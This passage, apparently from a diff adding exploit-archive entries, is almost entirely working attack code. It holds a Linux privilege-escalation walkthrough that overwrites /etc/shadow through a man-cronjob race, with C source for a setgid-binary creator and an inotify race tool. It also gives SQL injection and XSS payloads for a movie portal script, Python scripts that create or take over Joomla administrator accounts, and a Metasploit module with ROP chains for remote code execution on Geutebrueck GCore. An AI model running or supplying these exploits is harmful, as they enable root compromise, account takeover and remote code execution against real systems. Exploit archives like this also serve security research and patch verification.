+man$ wget -q http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/CreateSetgidBinary.c
+man$ gcc -o CreateSetgidBinary CreateSetgidBinary.c
+man$ ./CreateSetgidBinary ./escalate /bin/mount x nonexistent-arg
+Completed
+man$ ls -al ./escalate 
+-rwsrwsr-t 1 man root 155 May 15 02:12 ./escalate
+man$ ./escalate /bin/sh
+man$ ls -al /proc/self/
+total 0
+dr-xr-xr-x   9 man  root 0 May 15 02:13 .
+```
+
+
+## man:root -> root:root
+
+Finding hardlinking target: To start with, user man has to hardlink a file not owned by user man. Without hardlink protection (/proc/sys/fs/protected_hardlinks set to 0), any root owned system file will do and chown will make it accessible to user man.
+Without hardlink protection, user man one could race with find traversing the directories. It seems that new version of find with fts uses secure open and always checks stat of each file inode, both when entering subdirectories and when leaving. So a real hardlink to a file of another user is needed.
+
+Even with hardlink protection, linking to file writable by user man is still allowed, but files have to reside on same file system. On standard Ubuntu Vivid system, there are just few target files:
+
+```
+man# find / -mount -type f -perm -0002 2> /dev/null
+/var/crash/.lock
+man# ls -al /var/crash/.lock
+-rwxrwxrwx 1 root root 0 May 23 13:10 /var/crash/.lock
+```
+
+
+
+Using Timerace Using Inotify: As the mandb cronjob will change ownership of any file to user man, there are numerous targets for privilege escalation. The one I like best when /bin/su SUID binary is available to change /etc/shadow. PAM just does not recognise this state, so only root password has to be cleared for su logon. For that purpose, the good old inotify-tool DirModifyInotify-20110530.c from a previous article. To escalate following steps are sufficient:
+
+```
+man# mkdir -p /var/cache/man/etc
+man# ln /var/crash/.lock /var/cache/man/etc/shadow
+man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc
+... Wait till daily cronjob was run
+man# cp /etc/shadow .
+man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:99999:7:::/' /etc/shadow > x
+man# cat x > /etc/shadow; rm x
+man# su -s /bin/sh (password is 123)
+root# cat shadow > /etc/shadow; chown root /etc/shadow
+```
+If one does not want want PAM or su to write something to logs, trip over some audit/apparmor settings, we may want to make some library directory man-owned and place rogue library variant there.
+
+- - - - -
+
+/* CreateSetgidBinary.c */
+/** This software is provided by the copyright owner "as is" and any
+ *  expressed or implied warranties, including, but not limited to,
+ *  the implied warranties of merchantability and fitness for a particular
+ *  purpose are disclaimed. In no event shall the copyright owner be
+ *  liable for any direct, indirect, incidential, special, exemplary or
+ *  consequential damages, including, but not limited to, procurement
+ *  of substitute goods or services, loss of use, data or profits or
+ *  business interruption, however caused and on any theory of liability,
+ *  whether in contract, strict liability, or tort, including negligence
+ *  or otherwise, arising in any way out of the use of this software,
+ *  even if advised of the possibility of such damage.
+ *
+ *  This tool allows to create a setgid binary in appropriate directory
+ *  to escalate to the group of this directory.
+ *
+ *  Compile: gcc -o CreateSetgidBinary CreateSetgidBinary.c
+ *
+ *  Usage: CreateSetgidBinary [targetfile] [suid-binary] [placeholder] [args]
+ *
+ *  Example: 
+ *
+ *  # ./CreateSetgidBinary ./escalate /bin/mount x nonexistent-arg
+ *  # ls -al ./escalate
+ *  # ./escalate /bin/sh
+ *
+ *  Copyright (c) 2015 halfdog <me (%) halfdog.net>
+ *
+ *  See http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ for more information.
+ */
+
+#include <errno.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/resource.h>
+#include <unistd.h>
+#include <sys/wait.h>
+
+int main(int argc, char **argv) {
+// No slashes allowed, everything else is OK.
+  char suidExecMinimalElf[] = {
+      0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
+      0x80, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00,
+      0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0xa2, 0x00, 0x00, 0x00,
+      0xa2, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
+      0x01, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0xa4, 0x90, 0x04, 0x08,
+      0xa4, 0x90, 0x04, 0x08, 0x09, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
+      0x06, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xc0, 0x89, 0xc8,
+      0x89, 0xd0, 0x89, 0xd8, 0x04, 0xd2, 0xcd, 0x80, 0x31, 0xc0, 0x89, 0xd0,
+      0xb0, 0x0b, 0x89, 0xe1, 0x83, 0xc1, 0x08, 0x8b, 0x19, 0xcd, 0x80
+  };
+
+  int destFd=open(argv[1], O_RDWR|O_CREAT, 07777);
+  if(destFd<0) {
+    fprintf(stderr, "Failed to open %s, error %s\n", argv[1], strerror(errno));
+    return(1);
+  }
+
+  char *suidWriteNext=suidExecMinimalElf;
+  char *suidWriteEnd=suidExecMinimalElf+sizeof(suidExecMinimalElf);
+  while(suidWriteNext!=suidWriteEnd) {
+    char *suidWriteTestPos=suidWriteNext;
+    while((!*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
+      suidWriteTestPos++;
+// We cannot write any 0-bytes. So let seek fill up the file wihh
+// null-bytes for us.
+    lseek(destFd, suidWriteTestPos-suidExecMinimalElf, SEEK_SET);
+    suidWriteNext=suidWriteTestPos;
+    while((*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
+      suidWriteTestPos++;
+
+    int result=fork();
+    if(!result) {
+      struct rlimit limits;
+
+// We can't truncate, that would remove the setgid property of
+// the file. So make sure the SUID binary does not write too much.
+      limits.rlim_cur=suidWriteTestPos-suidExecMinimalElf;
+      limits.rlim_max=limits.rlim_cur;
+      setrlimit(RLIMIT_FSIZE, &limits);
+
+// Do not rely on some SUID binary to print out the unmodified
+// program name, some OSes might have hardening against that.
+// Let the ld-loader will do that for us.
+      limits.rlim_cur=1<<22;
+      limits.rlim_max=limits.rlim_cur;
+      result=setrlimit(RLIMIT_AS, &limits);
+
+      dup2(destFd, 1);
+      dup2(destFd, 2);
+      argv[3]=suidWriteNext;
+      execve(argv[2], argv+3, NULL);
+      fprintf(stderr, "Exec failed\n");
+      return(1);
+    }
+    waitpid(result, NULL, 0);
+    suidWriteNext=suidWriteTestPos;
+//  ftruncate(destFd, suidWriteTestPos-suidExecMinimalElf);
+  }
+  fprintf(stderr, "Completed\n");
+  return(0);
+}
+/* EOF */
+
+- - - - -
+
+/* DirModifyInotify-20110530.c */
+
+/** This program waits for notify of file/directory to replace
+ *  given directory with symlink.
+ *  Parameters:
+ *  * --LinkTarget: If set, the MovePath is replaced with link to
+ *    this path
+ *  Usage: DirModifyInotify.c --Watch [watchfile0] --WatchCount [num]
+ *      --MovePath [path] --LinkTarget [path] --Verbose
+ *  gcc -o DirModifyInotify DirModifyInotify.c
+ *
+ *  Copyright (c) halfdog <me (%) halfdog.net>
+ *  
+ *  This software is provided by the copyright owner "as is" to
+ *  study it but without any expressed or implied warranties, that
+ *  this software is fit for any other purpose. If you try to compile
+ *  or run it, you do it solely on your own risk and the copyright
+ *  owner shall not be liable for any direct or indirect damage
+ *  caused by this software.
+ */
+
+#include <errno.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/inotify.h>
+#include <sys/stat.h>
+
+int main(int argc, char **argv) {
+  char	*movePath=NULL;
+  char	*newDirName;
+  char	*symlinkTarget=NULL;
+
+  int	argPos;
+  int	handle;
+  int	inotifyHandle;
+  int	inotifyDataSize=sizeof(struct inotify_event)*16;
+  struct inotify_event *inotifyData;
+  int	randomVal;
+  int	callCount;
+  int	targetCallCount=0;
+  int	verboseFlag=0;
+  int	ret;
+
+  if(argc<4) return(1);
+  inotifyHandle=inotify_init();
+
+  for(argPos=1; argPos<argc; argPos++) {
+    if(!strcmp(argv[argPos], "--Verbose")) {
+      verboseFlag=1;
+      continue;
+    }
+
+    if(!strcmp(argv[argPos], "--LinkTarget")) {
+      argPos++;
+      if(argPos==argc) exit(1);
+      symlinkTarget=argv[argPos];
+      continue;
+    }
+
+    if(!strcmp(argv[argPos], "--MovePath")) {
+      argPos++;
+      if(argPos==argc) exit(1);
+      movePath=argv[argPos];
+      continue;
+    }
+
+    if(!strcmp(argv[argPos], "--Watch")) {
+      argPos++;
+      if(argPos==argc) exit(1);
+//IN_ALL_EVENTS, IN_CLOSE_WRITE|IN_CLOSE_NOWRITE, IN_OPEN|IN_ACCESS
+      ret=inotify_add_watch(inotifyHandle, argv[argPos], IN_ALL_EVENTS);
+      if(ret==-1) {
+        fprintf(stderr, "Failed to add watch path %s, error %d\n",
+            argv[argPos], errno);
+        return(1);
+      }
+      continue;
+    }
+
+    if(!strcmp(argv[argPos], "--WatchCount")) {
+      argPos++;
+      if(argPos==argc) exit(1);
+      targetCallCount=atoi(argv[argPos]);
+      continue;
+    }
+
+    fprintf(stderr, "Unknown option %s\n", argv[argPos]);
+    return(1);
+  }
+
+  if(!movePath) {
+    fprintf(stderr, "No move path specified!\n" \
+        "Usage: DirModifyInotify.c --Watch [watchfile0] --MovePath [path]\n" \
+        "    --LinkTarget [path]\n");
+    return(1);
+  }
+
+  fprintf(stderr, "Using target call count %d\n", targetCallCount);
+
+// Init name of new directory
+  newDirName=(char*)malloc(strlen(movePath)+256);
+  sprintf(newDirName, "%s-moved", movePath);
+  inotifyData=(struct inotify_event*)malloc(inotifyDataSize);
+
+  for(callCount=0; ; callCount++) {
+    ret=read(inotifyHandle, inotifyData, inotifyDataSize);
+    if(callCount==targetCallCount) {
+      rename(movePath, newDirName);
+//      rmdir(movePath);
+      if(symlinkTarget) symlink(symlinkTarget, movePath);
+      fprintf(stderr, "Move triggered at count %d\n", callCount);
+      break;
+    }
+    if(verboseFlag) {
+      fprintf(stderr, "Received notify %d, ret %d, error %s\n",
+          callCount, ret, (ret<0?strerror(errno):NULL));
+    }
+    if(ret<0) {
+      break;
+    }
+  }
+  return(0);
+}
+/* EOF */
--- a/platforms/php/webapps/41155.txt
+++ b/platforms/php/webapps/41155.txt
@ -0,0 +1,56 @@
+Exploit Title : Movie Portal Script v7.36 - Multiple Vulnerability
+Google Dork :    -
+Date : 20/01/2017
+Exploit Author : Marc Castejon <marc@silentbreach.com>
+Vendor Homepage : http://itechscripts.com/movie-portal-script/
+Software Link: http://movie-portal.itechscripts.com
+Type : webapps
+Platform: PHP
+Sofware Price and Demo : $250
+
+------------------------------------------------
+Type: Error Based Sql Injection
+Vulnerable URL:http://localhost/[PATH]/show_news.php
+Vulnerable Parameters: id
+Method: GET
+Payload:  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
+(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
+-----------------------------------------------
+Type: Reflected XSS
+Vulnerable URL: http://localhost/[PATH]/movie.php
+Vulnerable Parameters : f=
+Payload:<img src=i onerror=prompt(1)>
+---------------------------------------------
+Type: Error Based Sql Injection
+Vulnerable URL:http://localhost/[PATH]/show_misc_video.php
+Vulnerable Parameters: id
+Method: GET
+Payload:  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
+(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+-----------------------------------------------
+
+Type:Union Query Sql Injection
+Vulnerable URL:http://localhost/[PATH]/movie.php
+Vulnerable Parameters: f
+Method: GET
+Payload:  -4594 UNION ALL SELECT
+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7871,0x6452766b715a73727a634a497a7370474e6744576c737a6a436a6e566e546c68425a4b426a53544d,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
+-----------------------------------------------
+Type: Union Query Sql Injection
+Vulnerable URL:http://localhost/[PATH]/artist-display.php
+Vulnerable Parameters: act
+Method: GET
+Payload:  UNION ALL SELECT
+NULL,CONCAT(0x71706a7871,0x6b704f42447249656672596d4851736d486b45414a53714158786549644646716377666471545553,0x717a6a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
+-----------------------------------------------
+
+Type: Error Based Sql Injection
+Vulnerable URL:http://localhost/[PATH]/film-rating.php
+Vulnerable Parameters: v
+Method: GET
+Payload:  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
+(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
--- a/platforms/php/webapps/41156.py
+++ b/platforms/php/webapps/41156.py
@ -0,0 +1,53 @@
+#!/usr/bin/python3
+# CVE-2012-1563: Joomla! <= 2.5.2 Admin Creation
+# cf
+
+import bs4
+import requests
+import random
+
+
+url = 'http://vmweb.lan/joomla-cms-2.5.2/'
+form_url = url + 'index.php/using-joomla/extensions/components/users-component/registration-form'
+action_url = url + 'index.php/using-joomla/extensions/components/users-component/registration-form?task=registration.register'
+
+username = 'user%d' % random.randrange(1000, 10000)
+email = username + '@yopmail.com'
+password = 'ActualRandomChimpanzee123'
+
+user_data = {
+    'name': username,
+    'username': username,
+    'password1': password,
+    'password2': password + 'XXXinvalid',
+    'email1': email,
+    'email2': email,
+    'groups][': '7'
+}
+
+session = requests.Session()
+
+# Grab original data from the form, including the CSRF token
+
+response = session.get(form_url)
+soup = bs4.BeautifulSoup(response.text, 'lxml')
+
+form = soup.find('form', id='member-registration')
+data = {e['name']: e['value'] for e in form.find_all('input')}
+
+# Build our modified data array
+
+user_data = {'%s]' % k: v for k, v in user_data.items()}
+data.update(user_data)
+
+# First request will get denied because the two passwords are mismatched
+
+response = session.post(action_url, data=data)
+
+# The second will work
+
+data['jform[password2]'] = data['jform[password1]']
+del data['jform[groups][]']
+response = session.post(action_url, data=data)
+
+print("Account created for user: %s [%s]" % (username, email))
--- a/platforms/php/webapps/41157.py
+++ b/platforms/php/webapps/41157.py
@ -0,0 +1,55 @@
+#!/usr/bin/python3
+# CVE-2016-9838: Joomla! <= 3.6.4 Admin TakeOver
+# cf
+
+import bs4
+import requests
+import random
+
+
+ADMIN_ID = 384
+url = 'http://vmweb.lan/Joomla-3.6.4/'
+
+form_url = url + 'index.php/component/users/?view=registration'
+action_url = url + 'index.php/component/users/?task=registration.register'
+
+username = 'user%d' % random.randrange(1000, 10000)
+email = username + '@yopmail.com'
+password = 'ActualRandomChimpanzee123'
+
+user_data = {
+    'name': username,
+    'username': username,
+    'password1': password,
+    'password2': password + 'XXXinvalid',
+    'email1': email,
+    'email2': email,
+    'id': '%d' % ADMIN_ID
+}
+
+session = requests.Session()
+
+# Grab original data from the form, including the CSRF token
+
+response = session.get(form_url)
+soup = bs4.BeautifulSoup(response.text, 'lxml')
+
+form = soup.find('form', id='member-registration')
+data = {e['name']: e['value'] for e in form.find_all('input')}
+
+# Build our modified data array
+
+user_data = {'jform[%s]' % k: v for k, v in user_data.items()}
+data.update(user_data)
+
+# First request will get denied because the two passwords are mismatched
+
+response = session.post(action_url, data=data)
+
+# The second will work
+
+data['jform[password2]'] = data['jform[password1]']
+del data['jform[id]']
+response = session.post(action_url, data=data)
+
+print("Account modified to user: %s [%s]" % (username, email))
--- a/platforms/windows/remote/41153.rb
+++ b/platforms/windows/remote/41153.rb
@ -0,0 +1,304 @@
+# Exploit Title: Geutebrueck GCore X64 Full RCE Bufferoverflow for Metasploit
+# Date: 20170125
+# Exploit Author: Luca Cappiello, Maurice Popp
+# Contact(Twitter): @dopa_mined, @_m4p0
+# Github: https://github.com/m4p0/Geutebrueck_GCore_X64_RCE_BO
+# Vendor Homepage: http://www.geutebrueck.com/en_US/product-overview-31934.html
+# Software Link: None
+# Version: 1.3.8.42/1.4.2.37
+# Tested on: Win7, Win8/8.1, Win2012R2
+# CVE : None
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'nokogiri'
+require 'open-uri'
+
+class MetasploitModule < Msf::Exploit::Remote
+    include Msf::Exploit::Remote::Tcp
+
+    Rank = NormalRanking
+
+    def initialize(info = {})
+        super(update_info(info,
+                          'Name'		   => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE',
+                          'Description'	=> 'This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).',
+                          'License'		=> MSF_LICENSE,
+                          'Author'		 =>
+                          [
+                              'Luca Cappiello',
+                              'Maurice Popp'
+
+                          ],
+                          'References'	 =>
+                          [
+                              ['www.geutebrueck.com', '']
+                          ],
+                          'Platform'	   => 'win',
+                          'Targets'		=>
+                          [
+                              ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X86_64 }],
+                              ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X86_64 }],
+                              ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X86_64 }]
+                          ],
+                          'Payload'		=>
+                          {
+                              'Space' => '2000'
+                          },
+                          'Privileged'	 => false,
+                          'DisclosureDate' => 'Sep 01 2016',
+                          'DefaultTarget'  => 0))
+    end
+
+    def fingerprint
+        print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...')
+        @doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml'))
+        statistics = @doc.css('modulestate')
+        statistics.each do |x|
+            if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42')
+                mytarget = targets[1]
+                # print_status(mytarget.name)
+                print_status("Vulnerable version detected: #{mytarget.name}")
+                return Exploit::CheckCode::Appears, mytarget
+            elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37')
+                mytarget = targets[2]
+                # print_status(mytarget.name)
+                print_status("Vulnerable version detected: #{mytarget.name}")
+                return Exploit::CheckCode::Appears, mytarget
+                end
+        end
+        print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.')
+        print_status("Make sure that you know the exact version, otherwise you'll knock out the service.")
+        print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!')
+        print_status('After a crash, the videosurveillance system can not recover properly and stops recording.')
+        [Exploit::CheckCode::Unknown, nil]
+    end
+
+    def check
+        fingerprint
+    end
+
+    def ropchain(target)
+        if target.name.include? '1.3.8.42'
+            print_status('Preparing ROP chain for target 1.3.8.42!')
+
+            # 0x140cd00a9 | add rsp, 0x10 ; ret
+            # This is needed because the next 16 bytes are sometimes messed up.
+            overwrite = [0x140cd00a9].pack('Q<')
+
+            # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap.
+            stack_align = "\x43" * 16
+
+            # We have 40 bytes left to align our stack!
+            # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations
+            # and to restore it.
+            # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough.
+
+            # 0x1404e5cbf: mov edx, esp ; ret
+            stack_align += [0x1404e5cbf].pack('Q<')
+
+            # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value.
+            # We pop -XXXXX as \xxxxxxxxx to rax
+            # 0x14013db94  pop rax ; ret
+            stack_align += [0x14013db94].pack('Q<')
+            stack_align += [0xFFFFFFFFFFFFF061].pack('Q<')
+
+            # Our value is enough.
+            # 0x1407dc547  | add rax,rdx ; ret
+            stack_align += [0x1407dc547].pack('Q<')
+
+            # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back.
+            # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret
+            stack_align += [0x140ce9ac0].pack('Q<')
+
+            # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9.
+            # We want RCX to hold the value for VP Argument "Address of Shellcode"
+            # 0x140cc2234 |  mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret  ;
+            rop = ''
+            rop += [0x140cc2234].pack('Q<')
+            rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;
+            # 0x1400ae2ae    | POP RDX; RETN
+            # 0x...1000        | Value for VP "Size of Memory"
+            rop += [0x1400ae2ae].pack('Q<')
+            rop += [0x0000000000000400].pack('Q<')
+
+            # 0x14029dc6e:   | POP R8; RET
+            # 0x...40                | Value for VP "Execute Permissions"
+            rop += [0x14029dc6e].pack('Q<')
+            rop += [0x0000000000000040].pack('Q<')
+
+            # 0x1400aa030    | POP R9; RET
+            # 0x...            | Value for VP "Writeable location". Not sure if needed?
+            # 0x1409AE1A8 is the .data section of gcore; let's test with this writable section...
+            rop += [0x1400aa030].pack('Q<')
+            rop += [0x1409AE1A8].pack('Q<')
+
+            # 0x140b5927a: xor rax, rax ; et
+            rop += [0x140b5927a].pack('Q<')
+
+            # 0x1402ce220 pop rax ; ret
+            # 0x140d752b8 | VP Stub IAT Entry
+            rop += [0x1402ce220].pack('Q<')
+            rop += [0x140d752b8].pack('Q<')
+
+            # 0x1407c6b3b mov rax, qword [rax] ; ret  ;
+            rop += [0x1407c6b3b].pack('Q<')
+
+            # 0x140989c41 push rax; ret
+            rop += [0x140989c41].pack('Q<')
+
+            # 0x1406d684d jmp rsp
+            rop += [0x1406d684d].pack('Q<')
+
+            [rop, overwrite, stack_align]
+
+        elsif target.name.include? '1.4.2.37'
+            print_status('Preparing ROP chain for target 1.4.2.37!')
+
+            # 0x140cd9759 | add rsp, 0x10 ; ret
+            # This is needed because the next 16 bytes are sometimes messed up.
+            overwrite = [0x140cd9759].pack('Q<')
+
+            # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap.
+            stack_align = "\x43" * 16
+
+            # We have 40 bytes left to align our stack!
+            # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations
+            # and to restore it.
+            # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough.
+
+            # 0x1404f213f: mov edx, esp ; ret
+            stack_align += [0x1404f213f].pack('Q<')
+
+            # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value.
+            # We pop -XXXXX as \xxxxxxxxx to rax
+            # 0x14000efa8  pop rax ; ret
+            stack_align += [0x14000efa8].pack('Q<')
+            stack_align += [0xFFFFFFFFFFFFF061].pack('Q<')
+
+            # Our value is enough.
+            # 0x140cdfe65  | add rax,rdx ; ret
+            stack_align += [0x140cdfe65].pack('Q<')
+
+            # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back.
+            # 0x140cf3110 | mov rsp, rax ; ..... ; ret
+            stack_align += [0x140cf3110].pack('Q<')
+
+            # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9.
+            # We want RCX to hold the value for VP Argument "Address of Shellcode"
+            # 0x140ccb984 |  mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret  ;
+            rop = ''
+            rop += [0x140ccb984].pack('Q<')
+            rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;
+            # 0x14008f7ec    | POP RDX; RETN
+            # 0x...1000        | Value for VP "Size of Memory"
+            rop += [0x14008f7ec].pack('Q<')
+            rop += [0x0000000000000400].pack('Q<')
+
+            # 0x140a88f81:   | POP R8; RET
+            # 0x...40                | Value for VP "Execute Permissions"
+            rop += [0x140a88f81].pack('Q<')
+            rop += [0x0000000000000040].pack('Q<')
+
+            # 0x1400aa030    | POP R9; RET
+            # 0x...            | Value for VP "Writeable location". Not sure if needed?
+            # 0x140FB5000 is the .data section of gcore; let's test with this writable section...
+            rop += [0x1400aa030].pack('Q<')
+            rop += [0x140FB5000].pack('Q<')
+
+            # 0x140ccea2f: xor rax, rax ; et
+            rop += [0x140ccea2f].pack('Q<')
+
+            # 0x14000efa8 pop rax ; ret
+            # 0x140d83268 | VP Stub IAT Entry #TODO!
+            rop += [0x14000efa8].pack('Q<')
+            rop += [0x140d83268].pack('Q<')
+
+            # 0x14095b254 mov rax, qword [rax] ; ret  ;
+            rop += [0x14095b254].pack('Q<')
+
+            # 0x140166c46 push rax; ret
+            rop += [0x140166c46].pack('Q<')
+
+            # 0x140cfb98d jmp rsp
+            rop += [0x140cfb98d].pack('Q<')
+
+            [rop, overwrite, stack_align]
+
+        else
+            print_status('ROP chain for this version not (yet) available or the target is not vulnerable.')
+
+        end
+      end
+
+    def exploit
+        # mytarget = target
+        if target['auto']
+            checkcode, target = fingerprint
+            if checkcode.to_s.include? 'unknown'
+                print_status('No vulnerable Version detected - exploit aborted.')
+            else
+                target_rop, target_overwrite, target_stack_align = ropchain(target)
+                begin
+                    connect
+                    print_status('Crafting Exploit...')
+
+                    http_wannabe = 'GET /'
+                    buffer_200 = "\x41" * 200
+                    rop = target_rop
+                    payload.encoded
+                    buffer_1823 = "\x41" * 1823
+                    overwrite = target_overwrite
+                    stack_align = target_stack_align
+
+                    exploit = http_wannabe + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align
+                    print_status('Exploit ready for sending...')
+                    sock.put(exploit, 'Timeout' => 20)
+                    print_status('Exploit sent!')
+                    # sleep(10)
+                    buf = sock.get_once || ''
+                rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+                    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+                ensure
+                    print_status('Closing socket.')
+                    disconnect
+                    # sleep(10)
+                end
+            end
+
+        else
+            print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.')
+            print_status("Selected version: #{self.target.name}")
+            target_rop, target_overwrite, target_stack_align = ropchain(self.target)
+            begin
+                connect
+                print_status('Crafting Exploit...')
+
+                http_wannabe = 'GET /'
+                buffer_200 = "\x41" * 200
+                rop = target_rop
+                payload.encoded
+                buffer_1823 = "\x41" * 1823
+                overwrite = target_overwrite
+                stack_align = target_stack_align
+
+                exploit = http_wannabe + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align
+                print_status('Exploit ready for sending...')
+                sock.put(exploit, 'Timeout' => 20)
+                print_status('Exploit sent!')
+                # sleep(10)
+                buf = sock.get_once || ''
+            rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+                elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+            ensure
+                print_status('Closing socket.')
+                disconnect
+                # sleep(10)
+            end
+
+      end
+    end
+end